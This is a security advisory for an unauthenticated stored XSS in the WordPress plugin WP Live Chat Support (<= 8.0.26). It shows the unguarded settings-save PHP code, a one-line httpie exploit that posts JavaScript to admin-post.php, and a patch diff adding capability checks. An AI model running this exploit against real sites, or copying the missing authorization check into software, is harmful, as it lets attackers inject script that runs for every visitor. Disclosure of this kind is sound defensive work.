Skip to content

WP Live Chat Support <= 8.0.26 - Unauthenticated Stored XSS

Summary

Description Details
Name WP Live Chat Support <= 8.0.26 - Unauthenticated Stored XSS
Summary Unauthenticated user can add evil JS script to wordpress, that will be executed on every visitor hit. This version also has a XSS vulnerability in modules/gdpr.php
Affected application wp-live-chat-support
Affected revision <= 8.0.26
Vendor update available Yes
CVE
Ids CWE-79
CVSSv3.0 Base Score 5.8
CVSS vector AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Public Exploit available Yes
Exploit verified Yes
Authentication Required No

Vulnerable Code

<?php
## wp-live-chat-support.php
 205 if (function_exists('wplc_head_pro')) {
 206     add_action('admin_init', 'wplc_head_pro');
 207 } else {
 208     add_action('admin_init', 'wplc_head_basic');
 209 }

/* the code does not check if it is performed by administrator user */
/* admin_init can be triggered by calling admin-ajax.php or admin-post.php and can update the option wplc_custom_js */


4292 function wplc_head_basic() {
4293     global $wpdb;
4294 
4295     do_action("wplc_hook_head");


5727 
5728 add_action( "wplc_hook_head", "wplc_custom_scripts_save" );
5729 /**
5730  * Saves the custom scripts into the options table
5731  * @return void
5732  */
5733 function wplc_custom_scripts_save(){
5734 
5735         if( isset( $_POST['wplc_save_settings'] ) ){
5736 
5737                 if( isset( $_POST['wplc_custom_css'] ) ){
5738                         update_option( "WPLC_CUSTOM_CSS", nl2br( $_POST['wplc_custom_css'] ) );
5739                 }
5740 
5741                 if( isset( $_POST['wplc_custom_js'] ) ){
5742                         update_option( "WPLC_CUSTOM_JS", nl2br( $_POST['wplc_custom_js'] ) );
5743                 }
5744 
5745         }
5746 
5747 }

Exploit :

http -v --form  http://wplivechat.vulnsite.xxyy/wp-admin/admin-post.php   wplc_custom_js="alert('xss')"  wplc_save_settings=1  
$ wp option get WPLC_CUSTOM_JS 
alert(\'xss\')

Exploit Methodology

The attacker will have to do the following to exploit this vulnerability:-

  • Attacker can easily upload an evil JS and update wp option WPLC_CUSTOM_JS
  • Every visitor visiting the website runs evil JS

Security Patch

diff --git a/wp-content/plugins/wp-live-chat-support/modules/gdpr.php b/wp-content/plugins/wp-live-chat-support/modules/gdpr.php
index b039a06..96df18b 100644
--- a/wp-content/plugins/wp-live-chat-support/modules/gdpr.php
+++ b/wp-content/plugins/wp-live-chat-support/modules/gdpr.php
@@ -247,6 +247,7 @@ add_action('wplc_gdpr_page_process_actions_hook', 'wplc_gdpr_page_process_action
  * Handles the magic processing of the GDPR page
 */
 function wplc_gdpr_page_process_actions(){
+ if (current_user_can('export')) {
   if(isset($_GET['action']) && isset($_GET['filter']) && isset($_GET['id'])){
     $action = sanitize_text_field($_GET['action']);
     $filter = sanitize_text_field($_GET['filter']);
@@ -258,6 +259,9 @@ function wplc_gdpr_page_process_actions(){
       wplc_gdpr_download_chat($filter, $id);
     }
   }
+ } else {
+  wp_die(__("You do not have permission do perform this action", "wplivechat"));
+ }
 }

 /**
diff --git a/wp-content/plugins/wp-live-chat-support/wp-live-chat-support.php b/wp-content/plugins/wp-live-chat-support/wp-live-chat-support.php
index 74323aa..10e229d 100644
--- a/wp-content/plugins/wp-live-chat-support/wp-live-chat-support.php
+++ b/wp-content/plugins/wp-live-chat-support/wp-live-chat-support.php
@@ -5733,7 +5733,7 @@ add_action( "wplc_hook_head", "wplc_custom_scripts_save" );
 function wplc_custom_scripts_save(){

    if( isset( $_POST['wplc_save_settings'] ) ){
-
+       if (current_user_can('manage_options')) {
        if( isset( $_POST['wplc_custom_css'] ) ){
            update_option( "WPLC_CUSTOM_CSS", nl2br( $_POST['wplc_custom_css'] ) );
        }
@@ -5741,7 +5741,9 @@ function wplc_custom_scripts_save(){
        if( isset( $_POST['wplc_custom_js'] ) ){
            update_option( "WPLC_CUSTOM_JS", nl2br( $_POST['wplc_custom_js'] ) );
        }
-
+       } else {
+       wp_die(__("You do not have permission do perform this action", "wplivechat"));
+      }
    }

 }

References

Sucuri